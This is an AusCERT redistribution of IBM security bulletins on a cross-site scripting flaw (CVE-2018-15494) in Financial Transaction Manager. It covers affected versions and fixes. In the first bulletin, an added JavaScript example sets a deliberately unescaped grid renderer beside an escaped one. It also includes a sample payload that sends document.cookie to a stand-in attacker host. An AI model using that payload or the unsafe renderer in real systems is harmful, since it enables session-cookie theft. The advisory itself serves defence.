-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                              ESB-2019.2916.2
    Financial Transaction Manager for Digital Payments is affected by a
    potential cross-site scripting (XSS) vulnerability (CVE-2018-15494)
                              13 August 2019

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Financial Transaction Manager
Publisher:         IBM
Operating System:  Windows
                   UNIX variants (UNIX, Linux, OSX)
Impact/Access:     Cross-site Scripting -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2018-15494  

Reference:         ESB-2019.2889
                   ESB-2019.2380
                   ESB-2019.1481
                   ESB-2018.2610

Original Bulletin: 
   https://www.ibm.com/support/docview.wss?uid=ibm10795504
   https://www.ibm.com/support/docview.wss?uid=ibm10795518

Comment: This bulletin contains two (2) IBM security advisories.

Revision History:  August 13 2019: Added advisory for FTM for Check Services
                   August  5 2019: Initial Release

- --------------------------BEGIN INCLUDED TEXT--------------------

Financial Transaction Manager for Digital Payments is affected by a potential
cross-site scripting (XSS) vulnerability (CVE-2018-15494)

Product:             Financial Transaction Manager
Component:           Financial Transaction Manager for Digital Payments
Software version:    3.2.0, 3.2.2
Operating system(s): Platform Independent
Reference #:         0795504

Security Bulletin

Summary

Financial Transaction Manager for Digital Payments (FTM DP) for Multi-Platform
has addressed the following vulnerability. A potential cross-site scripting
vulnerability allows users to embed arbitrary JavaScript code in the Web UI,
altering the intended functionality and potentially leading to credential
disclosure within a trusted session.

Vulnerability Details

CVEID: CVE-2018-15494
DESCRIPTION: Dojo Toolkit is vulnerable to cross-site scripting, caused by
improper validation of user-supplied input by the DataGrid component. A remote
attacker could exploit this vulnerability to inject malicious script into a Web
page which would be executed in a victim's Web browser within the security
context of the hosting Web site, once the page is viewed. An attacker could use
this vulnerability to steal the victim's cookie-based authentication
credentials.
CVSS Base Score: 6.1
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/148556
for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
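The description above says the DataGrid fails to validate user-supplied input before it reaches the page. The following is an added illustration written for this bulletin, not Dojo's DataGrid code and not IBM code: a grid cell renderer that concatenates field values straight into markup (the sink class the CVE describes) beside one that escapes the value first. The sample payment rows, the evil.test host, and every function name here are constructed for the illustration; it runs under Node without a browser.

```javascript
// Added example, not from the bulletin or from Dojo/IBM: an unescaped grid
// cell is an HTML-injection sink; escaping in the text/attribute context closes it.

// Constructed sample rows, shaped like records a payments grid might receive.
// The second row's "reference" field carries attacker-controlled markup that,
// if rendered raw, would ship the session cookie to an attacker host.
const SAMPLE_ROWS = [
  { id: 1001, payee: 'ACME Ltd', reference: 'INV-2019-07' },
  { id: 1002, payee: 'Mallory',
    reference: '<img src=x onerror="fetch(\'//evil.test/?c=\'+document.cookie)">' },
];

// VULNERABLE: the field value becomes part of the markup unchanged.
function renderCellUnsafe(value) {
  return '<td>' + String(value) + '</td>';
}

// HARDENED: encode the five characters that are significant in HTML text and
// in double- or single-quoted attribute values before the value becomes markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}
function renderCellSafe(value) {
  return '<td>' + escapeHtml(value) + '</td>';
}

// Build a table body from the rows using the supplied cell renderer.
function renderTable(rows, renderCell) {
  const body = rows
    .map(r => '<tr>' + [r.id, r.payee, r.reference].map(renderCell).join('') + '</tr>')
    .join('\n');
  return '<table>\n' + body + '\n</table>';
}

// Check used to compare the two outputs: strip the template's own tags and see
// whether any raw '<' or '>' survives. Anything left came from the data.
function containsUntemplatedMarkup(html) {
  const stripped = html.replace(/<\/?(table|tr|td)>/g, '');
  return /[<>]/.test(stripped);
}

const unsafeHtml = renderTable(SAMPLE_ROWS, renderCellUnsafe);
const safeHtml = renderTable(SAMPLE_ROWS, renderCellSafe);

console.log('unsafe render carries injected markup:', containsUntemplatedMarkup(unsafeHtml));
console.log('escaped render carries injected markup:', containsUntemplatedMarkup(safeHtml));
```

Two caveats a practitioner should keep in mind. The escaper above is correct only for HTML text content and quoted attribute values; a value that lands in a URL, a JavaScript string, a CSS value or an unquoted attribute needs the encoder for that context, which is why the fix belongs in the component that knows where the value is going. And setting HttpOnly on the session cookie limits the cookie-theft outcome the bulletin describes, but not what injected script can do with the still-authenticated session, so the iFix or fix pack listed under Remediation/Fixes is the actual remedy.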

Affected Products and Versions

FTM DP v3.2.0.0 - v3.2.0.1, v3.2.2.0

Remediation/Fixes

Product    VRMF                 APAR      Remediation/First Fix

FTM DP     3.2.0.0, 3.2.0.1     PH07369   3.2.0.1-FTM-DP-MP-iFix0002
FTM DP     3.2.2.0              PH07369   3.2.2.0-FTM-DP-MP-iFix0003

Workarounds and Mitigations

None

Change History

2 August 2019: Original version published

Product Alias/Synonym

FTM
FTM DP

- --------------------------------------------------------------------------------

Security Bulletin: Financial Transaction Manager for Check Services is affected
by a potential cross-site scripting (XSS) vulnerability (CVE-2018-15494)

Document information
Component: Financial Transaction Manager for Check Services
Software version: 3.0.5
Operating system(s): Platform Independent
Reference #: 0795518
Modified date: 12 August 2019

Summary

IBM Financial Transaction Manager for Check Services (FTM CHK) for
Multi-Platform has addressed the following vulnerability. A potential
cross-site scripting vulnerability allows users to embed arbitrary JavaScript
code in the Web UI, altering the intended functionality and potentially leading
to credential disclosure within a trusted session.

Vulnerability Details

CVEID:  CVE-2018-15494
DESCRIPTION: Dojo Toolkit is vulnerable to cross-site scripting, caused by
improper validation of user-supplied input by the DataGrid component. A remote
attacker could exploit this vulnerability to inject malicious script into a Web
page which would be executed in a victim's Web browser within the security
context of the hosting Web site, once the page is viewed. An attacker could use
this vulnerability to steal the victim's cookie-based authentication
credentials.
CVSS Base Score: 6.1
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/148556
for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

Affected Products and Versions

FTM CHK v3.0.5.0 - 3.0.5.3

Remediation/Fixes

Product    VRMF                 APAR      Remediation/First Fix

FTM CHK    3.0.5.0 - 3.0.5.3    PH07373   3.0.5-FTM-Check-MP-fp0004

Workarounds and Mitigations

None

Change History

12 August 2019: Original version published

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBXVH+d2aOgq3Tt24GAQjqpw//ZCxI7Wn856heCroHmr7fDyCkmIHViXZT
Dv7UzMdc4q4v7+FtPrbzxkdjz8KNRZZR+gzDHTaUtXjJbFkOpvg0D9mKChP8ER7F
EBxCiGNZNtJAIqbkAnrZCV71iMxLjNIIOdr/w6eXW6bCJAxbP2UdZTPttb8fLcdL
6W3IVe6p5dpvZldqlGV7oLnImptHnsxJpuhHWq5IX/UlJme/WGGRNUrqhoyp+2Mk
TS+9g0k99ScPKolOeVD0G24+K6OQeQHOyHK8MHUJPSfc1VKaJwZX6i2LsQBwZmWv
z8GFdCKLBdwe4G0o1sZuD76lSPCVbt7zxYvVJFlAmmWRYl18rPNF5yJCDk26SgGb
o8BePXiIWtBBZpzdkH/ZyRJ62RUZLmfzKeEGX2MMroZMkrVzZ9jRf5Hsi5ZKb8vp
luNSu8fPBPR4rSctEpOSN2/ddRhtDhFXHpGAuPkcHwxBiT+t8fTyoyJbw8L08tO1
iruShM+s3mVYdck4YELOMQUt9dVZIH3GQVlwsFMdJ068In/aXj25PqPwx4rRK6YE
iW9zUq3ZPduS6Ena/P3D2YmcC2BRk6SN9Il4lgpIKoncYD9h8kbbP8on5P7Dmgvw
exxlQ/G5VoxPBAdnz9Ldqxp5LAxZ0eOrIjk01ob4nVIn4qCC8fcE3xgPyChDIAKk
J9M3UqlmKF0=
=ZGd1
-----END PGP SIGNATURE-----